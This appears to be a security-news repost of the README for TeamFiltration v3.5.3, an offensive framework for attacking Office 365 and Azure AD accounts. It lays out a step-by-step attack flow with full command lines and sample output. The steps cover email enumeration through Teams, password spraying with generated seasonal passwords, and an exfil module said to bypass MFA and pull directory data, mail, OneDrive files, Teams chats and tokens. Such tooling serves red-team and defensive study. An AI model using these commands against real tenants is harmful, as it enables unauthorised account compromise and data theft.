TeamFiltration v3.5.3 releases: enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts

by do son · Published September 11, 2022 · Updated August 7, 2023

TeamFiltration

TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts. See the Example Attack flow at the bottom of this readme for a general introduction into how TeamFiltration works!

This tool has been used internally since January 2021 and was publicly released in my talk “Taking a Dumb In The Cloud” during DefCON30.

You will need to provide a json config file to be able to use TeamFiltration. This configuration file contains information such as PushoverAPI keys, Dehashed API keys, Fireprox endpoints URL, and much more.

Example Attack Flow

Start the external by performing recon using Dehashed, Linkedin, Hunter.io, Google Dorks, etc. When you figured out what the email syntax for the company is, you are ready to enumerate and validate emails that exist within the target o365 tenant

The –outpath is needed for all modules within TeamFiltration and acts as a localised workspace/project folder for all information related to this attack/client to be stored

Start the enum with the following command, where –domain is your target client domain name

TeamFiltration.exe –outpath C:\Clients\2021\Example\TFOutput –config myConfig.json –enum –validate-teams –domain legitcorp.net

Choose the enumerated email syntax. This will pull different emails and syntaxes from the statistically likely usernames repo. Once you select a syntax, TeamFiltration will use its private, passive, and unsaturated Teams method to validate them (hence the –validate-teams argument)

[♥] TeamFiltration V0.3.2.6, created by @Flangvik

[+] Args parsed --outpath F:\Clients\Example\TFOutput --config myConfig.json --enum --validate-teams --domain legitcorp.net

[+] No usernames list provided, pulling statistically-likely-usernames

[?] Provide a target domain/tenant (e.g legitcorp.net) #> legitcorp.net

    |=> [1] john.smith@legitcorp.net

    |=> [2] john@legitcorp.net

    |=> [3] johnjs@legitcorp.net

    |=> [4] johns@legitcorp.net

    |=> [5] johnsmith@legitcorp.net

    |=> [6] jsmith@legitcorp.net

    |=> [7] smith@legitcorp.net

    |=> [8] smithj@legitcorp.net

    |=> [9] john_smith@legitcorp.net



[?] Select an email format #> 1

If you would like to supply your own email list to validate, simply use the –usernames argument. Validated emails get stored automatically in the TeamFiltration.db file located in the –outpath folder. This way, there is no need to supply data manually through each module.

[ENUM] 24.05.2021 12:31:05 EST Filtering out previusly attempted accounts

[ENUM] 24.05.2021 12:31:06 EST Enumerating 248231 possible accounts, this will take ~14 minutes

[ENUM] 24.05.2021 12:31:07 EST Successfully got Teams token for sacrificial account

[ENUM] 24.05.2021 12:31:07 EST Loaded 248231 usernames

[ENUM] 24.05.2021 12:31:08 EST enita.lintz@legitcorp.net valid!

[ENUM] 24.05.2021 12:31:09 EST bruce.wayne@legitcorp.net valid!

[ENUM] 24.05.2021 12:31:13 EST herminia.oliva@legitcorp.net valid!

[ENUM] 24.05.2021 12:31:13 EST thomas.anderson@legitcorp.net valid!

[ENUM] 24.05.2021 12:31:17 EST sharilyn.penning@legitcorp.net valid!

Next up we will spray the validated emails with the following command

TeamFiltration.exe –outpath C:\Clients\2021\Example\TFOutput –config myConfig.json –spray –sleep-min 120 –sleep-max 200

When no password list is provided, TeamFiltration will generate its own based on the Month, Season, and year! If you would like to supply your own passwordlist, simply use the –passwords argument.

With a set of valid credentials found, we can move into the exfil module. The valid credentials and account information is stored in the teamfiltration database, so you do not need to provide them when using the –exfil module.

TeamFiltration.exe –outpath C:\Clients\2021\Example\TFOutput –config myConfig.json –exfil –aad

This will attempt to bypass any MFA, and if successful, exfiltrate information from resources accessible within o365. The –aad or Azure Active Directory plugin will attempt to exfiltrate all users, groups, and domains from the o365 tenant. All new users will automatically be added to the database as valid users.

With those new valid accounts added, we can go back to the spraying module and successfully hit all the accounts in the domain.

You can also exfiltrate Emails + Attachments, OneDrive files, Teams Chat Logs + Attachments, and raw JWT tokens using different exfil plugins as shown in the –help menu.

Changelog v3.5.3

New exfil argument, –roadtools allows users to provide the .roadtools_auth file generate by ROADTools to be used for exfil
Added ‘–tenant-info’, eums tenant and domain information (Based on Invoke-AADIntReconAsOutsider from AADInternal by @DrAzureAD)
Added error handling for adding AAD users to database
Adjusted the logic for the Teams Enumeration method in order to resolve #36